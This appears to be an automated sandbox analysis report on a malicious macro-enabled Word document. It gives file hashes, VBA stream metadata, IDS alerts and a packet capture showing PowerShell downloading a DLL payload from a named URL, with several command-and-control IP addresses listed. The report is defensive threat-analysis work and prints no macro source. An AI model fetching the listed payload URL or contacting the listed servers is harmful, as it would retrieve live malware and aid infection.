                                                    SHA-256:44B271339E3D7B9CC739669C9AA6F27278FED1F62FFD7AD4AD29A6DB5B3D585F
                                                    SHA-512:77AB9925B07272BCEE77B6108ED06957975DD19886CEB3CEE2A885B59F9FE130A324B017D43FE6F4B7D1E2C0ABAB2265DA292050C3B7CCF79C4729648D0897BB
                                                    Malicious:false
                                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                    C:\Users\user\Desktop\~$CH_25_012021.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                    C:\Users\user\Kaktksw\An6othh\N49I.dll
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):631808
                                                    Entropy (8bit):6.9127096471964675
                                                    Encrypted:false
                                                    SSDEEP:12288:OYzchQVZnkmt/70MWugxPJZFpf0c1pH/bdJ8CA88fzsBsI3+Dc:B4KV5Hpt8bZHLp+CSfasO+
                                                    MD5:E09F65C1A92653035B27E603980CB205
                                                    SHA1:78DCA7A2190C82DC8DC4A0EAC302379804C79AA9
                                                    SHA-256:D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                                                    SHA-512:5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                    Joe Sandbox View:
                                                     • Filename: ARCH_25_012021.doc, Detection: malicious
                                                     • Filename: Arch_2021_717-1562532.doc, Detection: malicious
                                                    Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur alias aut sint sequi facilis., Author: Sebastian Melgar, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
                                                    Entropy (8bit):6.658685583484107
                                                    TrID:
                                                    • Microsoft Word document (32009/1) 79.99%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                    File name:ARCH_25_012021.doc
                                                    File size:175104
                                                    MD5:baedc37e68b58765fa52c73d0fd2c2d5
                                                    SHA1:2131d1319b5de532638d34f1e3bf68337b6099bf
                                                    SHA256:94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa
                                                    SHA512:d0043f410e6b5aeb4aa07d331dcfb00977ee90471b5196a5d1431ddb3a5221f42546d9ed895c5b98ca649662468632289ccea2ec1ec5fda4269bb100414ad287
                                                    SSDEEP:1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFkBnyAZ:+TdcrrXyQBsc0vWJVi4IrwVSBH
                                                    File Content Preview:........................>................................... ..................................................................................................................................................................................................

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "ARCH_25_012021.doc"

Indicators

Has Summary Info: True
Application Name: Microsoft Office Word
Encrypted Document: False
Contains Word Document Stream: True
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1252
Title: Tenetur alias aut sint sequi facilis.
Subject:
Author: Sebastian Melgar
Keywords:
Comments:
Template:
Last Saved By:
Revision Number: 1
Total Edit Time: 0
Create Time: 2021-01-25 09:28:00
Last Saved Time: 2021-01-25 09:28:00
Number of Pages: 1
Number of Words: 5622
Number of Characters: 32047
Creating Application: Microsoft Office Word
Security: 8

Document Summary

Document Code Page: -535
Number of Lines: 267
Number of Paragraphs: 75
Thumbnail Scaling Desired: False
Company: Orta S.L.
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504

Streams with VBA

VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173
General
Stream Path: Macros/VBA/A5ate73kc6cw5njy
VBA File Name: A5ate73kc6cw5njy
Stream Size: 1173

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Name
VB_Creatable
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
VBA File Name: Gusca95luq_, Stream Size: 14646
General
Stream Path: Macros/VBA/Gusca95luq_
VBA File Name: Gusca95luq_
Stream Size: 14646

VBA Code Keywords

VBA Code
VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704
General
Stream Path: Macros/VBA/Zcf1kk3t2ssv4r07m
VBA File Name: Zcf1kk3t2ssv4r07m
Stream Size: 704

VBA Code Keywords

Keyword
Attribute
VB_Name
VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146
General
Stream Path: \x1CompObj
File Type: data
Stream Size: 146
Entropy: 4.00187355764
Base64 Encoded: False
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 304
General
Stream Path: \x5DocumentSummaryInformation
File Type: data
Stream Size: 304
Entropy: 2.82977037235
Base64 Encoded: False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
General
Stream Path: \x5SummaryInformation
File Type: data
Stream Size: 448
Entropy: 3.46647630871
Base64 Encoded: False
Stream Path: 1Table, File Type: data, Stream Size: 6885
General
Stream Path: 1Table
File Type: data
Stream Size: 6885
Entropy: 6.02650234948
Base64 Encoded: True
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
General
Stream Path: Macros/PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 520
Entropy: 5.52447471798
Base64 Encoded: True
Data ASCII (PROJECT stream text, one record per CRLF-terminated line):
ID="{B315CD83-AEFA-4B0A-9946-631D489C22F0}"
Document=A5ate73kc6cw5njy/&H00000000
Module=Zcf1kk3t2ssv4r07m
Module=Gusca95luq_
ExeName32="Jvk593odowjquyoo"
Name="mx"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="AFAD464DFAF3D1F7D1F7D1F7D1F7"
                                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                                    General
                                                    Stream Path:Macros/PROJECTwm
                                                    File Type:data
                                                    Stream Size:143
                                                    Entropy:3.86963281051
                                                    Base64 Encoded:False
                                                    Data ASCII:A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
                                                    Data Raw:41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39
                                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837
                                                    General
                                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                                    File Type:data
                                                    Stream Size:4837
                                                    Entropy:5.51877025189
                                                    Base64 Encoded:True
                                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                    Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628
                                                    General
                                                    Stream Path:Macros/VBA/dir
                                                    File Type:WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
                                                    Stream Size:628
                                                    Entropy:6.34127378287
                                                    Base64 Encoded:True
                                                    Data ASCII:. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                                    Data Raw:01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                    Stream Path: WordDocument, File Type: data, Stream Size: 129150
                                                    General
                                                    Stream Path:WordDocument
                                                    File Type:data
                                                    Stream Size:129150
                                                    Entropy:7.03372694627
                                                    Base64 Encoded:True
                                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                    Stream Path: office, File Type: data, Stream Size: 796
                                                    General
                                                    Stream Path:office
                                                    File Type:data
                                                    Stream Size:796
                                                    Entropy:7.73402004362
                                                    Base64 Encoded:False
                                                    Data ASCII:. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e | . . N . l & . t . k . . + . . E . # . . I . . . O .
                                                    Data Raw:05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                     Timestamp                 Protocol  SID      Message                                                Source Port  Dest Port  Source IP     Dest IP
                                                     01/27/21-09:30:55.632048  TCP       2404344  ET CNC Feodo Tracker Reported CnC Server TCP group 23  49168        80         192.168.2.22  84.232.229.24
                                                     01/27/21-09:31:03.941037  TCP       2404334  ET CNC Feodo Tracker Reported CnC Server TCP group 18  49169        8080       192.168.2.22  51.255.203.164
                                                     01/27/21-09:31:50.136378  TCP       2404328  ET CNC Feodo Tracker Reported CnC Server TCP group 15  49171        8080       192.168.2.22  217.160.169.110
                                                     01/27/21-09:31:59.138097  TCP       2404314  ET CNC Feodo Tracker Reported CnC Server TCP group 8   49173        80         192.168.2.22  185.183.16.47

                                                    Network Port Distribution

                                                    TCP Packets

                                                     Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                     Jan 27, 2021 09:30:35.713542938 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:35.900213003 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:35.900363922 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:35.902981997 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.134855986 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.428189039 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.428216934 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.428234100 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.428479910 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.614783049 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628119946 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628206968 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628264904 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628310919 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.628317118 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628351927 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.628376007 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628427982 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628451109 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.628480911 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628530025 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628556013 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.628585100 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.628664970 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.814851999 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.814924955 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.814977884 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815032959 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815083027 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815114021 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815140009 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815151930 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815193892 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815216064 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815248013 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815300941 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815315008 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815354109 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815403938 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815418005 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815455914 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815505981 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815526009 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815565109 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815618992 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815642118 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815670967 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815722942 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815737963 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815773964 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815823078 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815840960 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:36.815869093 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:36.815946102 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.002271891 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002356052 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002454042 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.002504110 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002567053 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002626896 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002672911 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002753019 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.002835989 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.002971888 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003051996 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003091097 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003109932 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003144979 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003161907 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003190041 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003237963 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003262043 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003289938 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003334999 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003357887 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003371954 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003412962 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003433943 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003452063 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003488064 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003520966 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.003520966 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.003577948 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030143023 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030201912 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030241013 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030313015 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030350924 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030368090 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030409098 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030412912 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030492067 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030515909 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030563116 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030577898 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030603886 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030641079 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030656099 CET  80           49167      192.169.223.13  192.168.2.22
                                                     Jan 27, 2021 09:30:37.030690908 CET  49167        80         192.168.2.22    192.169.223.13
                                                     Jan 27, 2021 09:30:37.030699015 CET  80           49167      192.169.223.13  192.168.2.22

                                                    UDP Packets

                                                     Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                                     Jan 27, 2021 09:30:35.644503117 CET  52197        53         192.168.2.22  8.8.8.8
                                                     Jan 27, 2021 09:30:35.703138113 CET  53           52197      8.8.8.8       192.168.2.22

                                                    DNS Queries

                                                     Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name           Type            Class
                                                     Jan 27, 2021 09:30:35.644503117 CET  192.168.2.22  8.8.8.8  0xd372    Standard query (0)  shannared.com  A (IP address)  IN (0x0001)

                                                    DNS Answers

                                                     Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name           CName  Address         Type            Class
                                                     Jan 27, 2021 09:30:35.703138113 CET  8.8.8.8    192.168.2.22  0xd372    No error (0)  shannared.com         192.169.223.13  A (IP address)  IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • shannared.com

                                                    HTTP Packets

                                                     Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                     0           192.168.2.22  49167        192.169.223.13  80                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                     Timestamp                            kBytes transferred  Direction  Data
                                                     Jan 27, 2021 09:30:35.902981997 CET  0                   OUT        GET /content/lhALeS/ HTTP/1.1
                                                    Host: shannared.com
                                                    Connection: Keep-Alive
                                                     Jan 27, 2021 09:30:36.428189039 CET  1                   IN         HTTP/1.1 200 OK
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Wed, 27 Jan 2021 08:30:36 GMT
                                                    Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/
                                                    Last-Modified: Wed, 27 Jan 2021 08:30:36 GMT
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    Content-Type: application/octet-stream
                                                    X-Cacheable: YES:Forced
                                                    Content-Length: 631808
                                                    Accept-Ranges: bytes
                                                    Date: Wed, 27 Jan 2021 08:30:36 GMT
                                                    Age: 0
                                                    Vary: User-Agent
                                                    X-Cache: uncached
                                                    X-Cache-Hit: MISS
                                                    X-Backend: all_requests
